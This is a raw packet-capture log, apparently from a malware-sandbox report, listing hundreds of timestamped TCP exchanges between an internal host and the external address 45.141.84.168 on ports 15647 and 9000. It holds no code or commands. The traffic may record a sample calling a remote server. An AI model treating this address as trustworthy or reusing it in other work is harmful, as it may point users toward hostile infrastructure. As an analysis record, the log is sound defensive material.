                                          Nov 28, 2024 13:40:35.136459112 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.143482924 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.143749952 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.155723095 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.156470060 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.164702892 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.164896965 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.172833920 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.173155069 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.179342031 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.180891991 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.194436073 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.195516109 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.208081007 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.213529110 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.216938019 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.224818945 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.228667021 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.231571913 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.231661081 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.233191013 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.235629082 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.239769936 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.240436077 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.244440079 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.244544029 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.249655962 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.252521038 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.262501001 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.264852047 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.265634060 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.265696049 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.282049894 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.287273884 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.288856983 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.293212891 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.296427011 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.303342104 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.304491043 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.313518047 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.316617966 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.317306995 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.328519106 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.328959942 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.329967976 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.330037117 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.338207960 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.340517044 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.346224070 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.348556042 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.351712942 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.351788998 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.358083010 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.360522985 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.365586042 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.365657091 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.377749920 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.377839088 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.385656118 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.385775089 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.398111105 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.399739027 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.402204990 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.402270079 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.416096926 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.416470051 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.418128967 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.418224096 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.432848930 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.432956934 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.448873043 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.450033903 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.458012104 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.460573912 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.465743065 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.465905905 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.466005087 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.471760988 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.472758055 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.485690117 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.486850023 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.488584042 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.492432117 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.503226995 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.503317118 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.503412962 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.519716024 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.519867897 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.530008078 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.530088902 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.536233902 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.536289930 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.547264099 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.547377110 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.562293053 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.562520981 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.562597990 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.566843033 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.566920996 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.570228100 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.570298910 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.574840069 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.574906111 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.586018085 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.586253881 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.586273909 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.593493938 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.593620062 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.593676090 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.607026100 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.607476950 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.610519886 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.610649109 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.610781908 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.617732048 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.618011951 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.625888109 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.625946045 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.625960112 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.638127089 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.638484001 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.650161028 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.650254011 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.650341988 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.650455952 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.650496006 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.662091970 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.673300982 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.673363924 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.673399925 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.682028055 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.682077885 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.682468891 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.690256119 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.690390110 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.699398041 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.699453115 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.699460983 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.699500084 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.707392931 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.707453012 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.707484007 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.707520008 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.721062899 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.721419096 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.723592043 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.723651886 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.723680973 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.730803013 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.730854034 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.738511086 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.738565922 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.739487886 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.739556074 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.739598036 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.754868984 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.754933119 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.762348890 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.762423038 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.762423992 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.767934084 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.768652916 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.782040119 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.782115936 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.782188892 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.787499905 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.788444996 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.793833017 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.796602011 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.808267117 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.808336973 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.808413029 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.819319963 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.819331884 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.819410086 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.824753046 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.828491926 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.839270115 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.840635061 CET90004985545.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.840666056 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.840742111 CET90004985545.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.841017008 CET498559000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.841042995 CET498559000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.841275930 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.841320038 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.843718052 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.843785048 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.857530117 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.857541084 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.857614994 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.859659910 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.875838995 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.875897884 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.875998020 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.882847071 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.896171093 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.896222115 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.896291018 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.907690048 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.908479929 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.916857958 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.924738884 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.928463936 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.928747892 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.928757906 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.928807974 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.931925058 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.931981087 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.939174891 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.940490961 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.948683023 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.949790001 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.954024076 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.954108000 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.954202890 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.954992056 CET498609000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.960983992 CET90004985545.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.963665962 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.963761091 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.968081951 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.968130112 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:35.968141079 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.988636971 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.988647938 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:35.988727093 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.002702951 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.002757072 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.002788067 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.011606932 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.012564898 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.020210981 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.020518064 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.030626059 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.030790091 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.030842066 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.045135975 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.045459986 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.052243948 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.052301884 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.060411930 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.060524940 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.073879004 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.074114084 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.074868917 CET90004986045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.074964046 CET498609000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.075113058 CET498609000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.076276064 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.076318979 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.076384068 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.080094099 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.080133915 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.080202103 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.088159084 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.088275909 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.103672028 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.103763103 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.103842974 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.109853029 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.109919071 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.118143082 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.120476961 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.129651070 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.132632971 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.140818119 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.144560099 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.157284975 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.161900043 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.164542913 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.172291040 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.172486067 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.178797960 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.180623055 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.193614960 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.206275940 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.219530106 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.232757092 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.245266914 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.258758068 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.271655083 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.283905983 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.284459114 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.284471989 CET90004986045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.284480095 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.284549952 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.286761045 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.286839008 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.292498112 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.292510986 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.292589903 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.300542116 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.304476976 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.317873955 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.331442118 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.369005919 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.384319067 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.399691105 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.406486034 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.406503916 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.406579971 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.410624981 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.410680056 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.412456989 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.412595987 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.424588919 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.424602985 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.424618006 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.424715996 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.461945057 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.477787018 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.489151001 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.489164114 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.489223003 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.489233971 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.489245892 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.489252090 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.489257097 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.489269972 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.489291906 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.489301920 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.489310980 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.489312887 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.489321947 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.489334106 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.489343882 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.489368916 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.489378929 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.489404917 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.489435911 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.489440918 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.489456892 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.489470005 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.489480019 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.489481926 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.489490032 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.489499092 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.489516973 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.489525080 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.489545107 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.489559889 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.489645958 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.489703894 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.493940115 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.493983030 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.504679918 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.504781961 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.506843090 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.506891012 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.506916046 CET4973015647192.168.2.445.141.84.168
